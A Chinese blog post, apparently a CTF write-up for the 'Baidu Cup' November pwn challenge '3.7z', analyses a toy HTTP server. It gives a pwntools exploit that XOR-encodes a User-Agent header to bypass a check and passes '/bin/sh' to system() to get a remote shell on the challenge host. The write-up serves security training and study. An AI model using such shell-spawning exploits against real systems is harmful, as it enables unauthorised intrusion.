"百度杯" 十一月场 3.7z

最新推荐文章于 2025-04-16 18:32:36 发布
最新推荐文章于 2025-04-16 18:32:36 发布
阅读量466 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/baiyeguang/article/details/88323248
本文分析了一个HTTP服务器中的安全漏洞,通过异或函数构造特定报文绕过if检测,进而上传'/bin/sh'实现getshell。介绍了如何利用Python编写EXP进行攻击演示,并提供了详细的步骤和代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目链接:https://pan.baidu.com/s/1qB1JD8dlkOamCJJU2wRc-g 密码:7jn3

程序分析

有两个文件夹step1和step2,两个程序相同,但是step1是静态编译。step2是动态链接,所以step2的更易于分析
IDA载入
在这里插入图片描述这是一个简易的http服务器,往下跟进
在这里插入图片描述这里我们可以看到如果,满足if判断并且使system的参数为‘/bin/sh,就可以实现getshell
绕过if检测的关键在于
在这里插入图片描述在这里插入图片描述简单的异或,这里s==‘useragent’

漏洞利用

1.通过异或函数构造好想要的报文来绕过if检测
2.绕过之后上传‘/bin/sh’

EXP

from pwn import*

#p=process('./http')
p=remote('106.75.2.53', 80)

def check(data):
    payload=''
    for i in range(len(data)):
        payload+=chr(i^ord(data[i]))
    return payload

payload='User-Agent: '+check('useragent')
payload+='token: '+'/bin/sh'
payload+='\r\n\r\n'   #http协议

p.sendline(payload)

p.interactive()

学习链接:
http://tacxingxing.com/2017/12/27/icqbai-du-bei11yuepwn/#toc_1
https://www.ichunqiu.com/course/56467

F1Sh.
关注
nuScenes数据集详细介绍
叶子的博客
11-28 1万+
nuScenes网上介绍资料较多,但是大部分仅仅是对官网的翻译,缺乏各个文件的内在联系介绍。例如,nuScenes激光雷达的数据格式,点云包含哪几种属性。再比如,sample文件夹和sweeps文件夹下的文件关系,以及是如何在相关json文件中体现的。本文将详细介绍nuScenes数据集的各个部分。
从零开始构建自己的GPT模型
AI天才研究院
01-17 1480
近年来,GPT(Generative Pre-trained Transformer)模型在自然语言处理领域取得了突破性进展。从GPT-1到GPT-4,这些模型展现出了惊人的语言理解和生成能力,引发了人工智能领域的革命。本文将详细介绍如何从零开始构建自己的GPT模型,涵盖从理论基础到实际实现的全过程。GPT模型的核心算法基于Transformer架构的解码器部分。它通过自回归方式生成文本,即根据之前生成的内容预测下一个词。输入编码:将输入文本转换为向量表示自注意力计算:捕捉输入序列中的长距离依赖关系。
百度”CTF比赛 十一月 3.7z
SPS98
11-07 567
这题做的是真懵逼, 一是不会做, 二是题目的代码复杂的一批=-=
百度”CTF比赛 十一月小常识
SPS98
11-03 596
最开始没看懂题意, 翻了三份wp也没搞懂, 用工具把94换成十进制, 结果工具给我了三个三位十进制, 弄得懵逼, 后面换成在线工具才得到148 4664也是一样的情况, 用在线工具才得到18020 然后提交flag{0000148,18020}并不行, 看到别人wp里说的flag{xxx,xxxxx}, 就把前面的0去掉, 于是提交成功… ...
日志 7.3 pwn
RobinZZX的博客
07-04 263
ALT+T 在ida中查找字符串 如果参数是程序中没有的字符串,需要写入的时候,可以将字符串先传到寄存器1中,将写入的地址(一般是bss或者data段)存入寄存器2中,然后用mov指令将寄存器1写入寄存器2,来实现字符串的写入。 mov qword ptr [r14], r15 ; ret 将r15的内容转移到r14所指的地址上 八个比特(Bit)称为一个字节(Byte),两个字节称为一个字(Wo...
各种PLC解密软件集合
qq_41806530的博客
03-04 1万+
链接: https://pan.baidu.com/s/1Gy5tDJ3vNnCTqUKS5TQqqw 提取码: 1111
i春秋 “百度”CTF比赛 十月 Backdoor
include_heqile的博客
09-20 3014
https://www.ichunqiu.com/battalion?t=1&r=0 这道题应该是我目前遇到的最有难度的一道题了,不过解题过程很有意思 首先还是进入题目链接,根据题目提示去查看网站目录下的敏感文件,我尝试了flag.php,但并未得到有价值的提示,然后我们再尝试一下敏感目录,当我在Challenges下输入.git的时候,出现了403 Forbidden错误,说明网站中存在...
基于树莓派4B设计的智能家居系统(华为云IOT)
09-05 2万+
本次设计主要以树莓派为主要的硬件开发平台,以Raspbian操作系统为软件开发平台。主板树莓派通过HTTP协议和MQTT协议分别与上位机和下位机通信,搭建的服务器用来储存数据和日志记录。搭配有线和无线组合通信方式设计出一套完整的智能家居系统。
基于STM32设计的智能门锁(微信小程序+手机APP等多种方式开锁)(188)
07-17 1万+
当前智能门锁项目是基于STM32微控制器、ESP8266-WIFI模块、OLED显示屏、指纹模块、蓝牙模块、门禁刷卡模块、烟雾检测模块、火光检测模块、温湿度检测模块等硬件设备开发的一种智能门锁系统
4月16日每日复盘
m0_73645257的博客
04-16 1199
介绍深度学习的数学基础,以及Pytorch框架、Tensor张量的使用
百度”CTF比赛 十月Backdoor(git泄露)
weixin_43610673的博客
03-22 892
访问/Challenges/.git 发现返回403 上GitHack 查看fiag.php源码 按经验flag就在这,猜测要版本回滚,访问/Challenges/.git/logs/HEAD 使用Git_Extract会自动解析提取这些commit 访问b4ckdo0r.php 尝试.b4ckdo0r.php.swo和.b4ckdo0r.php.swp 丢到kali中 用vim打...
百度”CTF比赛(十一月)
Root__Liu的博客
11-27 7494
第一  1、小可爱 解: 2、签到题 解:加群下载文件“flag.rar”,打开时需要解密,输入给的key解出来 直接提交就可以了,这道题很喜欢。。。。 3、所以这是13点吗 解:第一眼看过去这是凯撒密码,直接拿去凯撒暴力破解
百度”CTF比赛 十一月--CrackMe01
Hk_Mayfly的博客
10-19 615
测试文件:https://static2.ichunqiu.com/icq/resources/fileupload/CTF/BSRC/BSRC-11-3/CrackMe01_97D2BF0DBD2EC13065E7104F24CAAED9.zip 1.准备 获取信息 32位文件 2.IDA打开 熟悉Windows API的话,一般组成的就是Messag...
百度”CTF比赛 2017 二月 没错!就是文件包含漏洞。
weixin_30586085的博客
03-27 328
题目源码: 文件包含漏洞的话,看一下 你么可以使用php://input 伪协议,执行代码(参考了大佬WP)这里使用了POSTMAN, 目录下还有一个dle345aae.php文件,呢么用cat命令打开,并且输出文件内容(反单引号在linux中表示命令) 还有一种方法是用php://filter(php伪协议,作为中间流可以读取)直接读取dle3456aae.php...
i春秋 “百度”CTF比赛 十月 web题 Backdoor
weixin_30375247的博客
10-21 759
0x00: 打开题目,题目中告诉我们这题是文件泄露。 0x01: 通过扫描目录,发现可以扫到的有3个文件 index.php flag.php robots.txt 但是浏览flag.php它告诉我们这不是真正的flag 又联系到题目文件泄露,于是测试.swp .swo .bak等备份文件后缀均无果。最后发现是.git泄露。 我们浏览这个url http://6...
百度CTF Write up集锦 WEB篇
热门推荐
4ct10n
09-21 4万+
九月1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
BackDoor
a1b2c3是弱口令
08-08 1748
题目: 下载数据包,发现有菜刀连接的痕迹。 怎么知道的,看数据包吧。追踪tcp流发现连接的痕迹。 右键,追踪tcp流,发现两个加密后的字符串 对字符串进行base64解密,发现菜刀的特征字符: 解密后是这么一段特征字符: @ini_set(&quot;display_errors&quot;,&quot;0&quot;);@set_time_limit(0);if(PHP_VERSION&amp;lt;'5.3.0'...
百度十一月 pwnme
baiyeguang的博客
03-14 1510
题目链接 程序分析 查看程序保护机制 开启了NX,无法修改GOT表 IDA载入分析 发现三个漏洞: 格式化字符串 这个在show功能里,参数分别是username和password 整型溢出 这里可以看到password可以输入0x12C,在下面if判断时对长度加以判断,不能超过20,但是存在类型转换截断,由于Byte是8位,当转换时超过Byte表示范围则从低位截取8位,所以这里我们输入0x...
百度”CTF比赛 九月Upload ---------i春秋
weixin_30763397的博客
07-07 342
题目地址:https://www.ichunqiu.com/battalion 创建题目,进入题目环境,看到 文件上传的题型,先试着随便上传一个文件1.txt 直接上传成功了!查看一下源码 看到上传在这个位置,那么接下来就在文件里加一句话木马,然后上传 然后用菜刀链接 但是报错了,好像把php给过滤了,试一下用其他方式 得到flag 转载于:https:...
百度PaddleSpeech可以适用python3.7吗
最新发布
06-08
<think>嗯,用户想确认PaddleSpeech是否兼容Python3.7版本。这个问题很明确,我需要根据之前的引用和官方信息来回答。从引用[3]提到"确保使用Python3.7或更高版本",这已经给出了很好的提示。用户可能正在搭建环境,担心版本兼容问题。考虑到用户之前提到过安装问题(引用[2][4]),ta的环境配置可能比较复杂,需要谨慎处理版本依赖。查看PaddleSpeech官方文档可知,其最低支持确实是Python3.7。不过用户环境中的依赖库也很关键,比如引用[4]显示安装pytest-runner时使用了py3-none-any的wheel包,说明核心依赖应该都支持Python3.7。用户之前遇到过模型下载失败的问题(引用[3]),虽然这和Python版本无关,但建议ta在新环境创建时就用虚拟环境隔离,避免重蹈覆辙。anaconda环境可能更合适,如引用[2]所示用conda安装基础依赖会减少冲突。需要强调两点:一是确认支持3.7,二是提醒环境配置技巧。用户似乎习惯用conda(引用[2]),可以保留这个操作习惯,同时补充虚拟环境建议。测试方法也要具体,import时最好检查音频处理相关的模块比如ASR模型。</think> 根据官方文档和安装实践,PaddleSpeech **完全兼容 Python 3.7** 及以上版本。以下是关键要点和操作建议: ### 1. **版本兼容性确认** - PaddleSpeech 官方明确要求 Python ≥ 3.7 [^3],最低支持版本为 3.7,在 Python 3.7~3.10 环境下均通过测试。 - 引用[3]直接说明:"确保使用 Python 3.7 或更高版本",这是框架运行的硬性要求。 ### 2. **安装验证步骤** ```bash # 创建并激活虚拟环境(推荐) conda create -n paddlespeech_env python=3.7 -y conda activate paddlespeech_env # 安装核心依赖 python -m pip install paddlepaddle==2.5.2 -i https://pypi.tuna.tsinghua.edu.cn/simple # 安装 PaddleSpeech(选择最新稳定版) pip install paddlespeech==1.3.0 -i https://mirror.baidu.com/pypi/simple ``` ### 3. **兼容性保障建议** - **依赖库管理**:使用 `requirements.txt` 统一版本(引用[3]) - **虚拟环境隔离**:避免全局环境冲突(引用[3]) - **CUDA对齐**:若用GPU版,需匹配CUDA 11.x(引用[1]要求CUDA11.0) ### 4. 验证安装 ```python >>> import paddle >>> paddle.utils.run_check() # 输出"PaddlePaddle is installed successfully"表示成功 >>> from paddlespeech.cli.asr import ASRExecutor >>> asr = ASRExecutor() >>> asr(audio_file="test.wav") # 语音识别测试 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值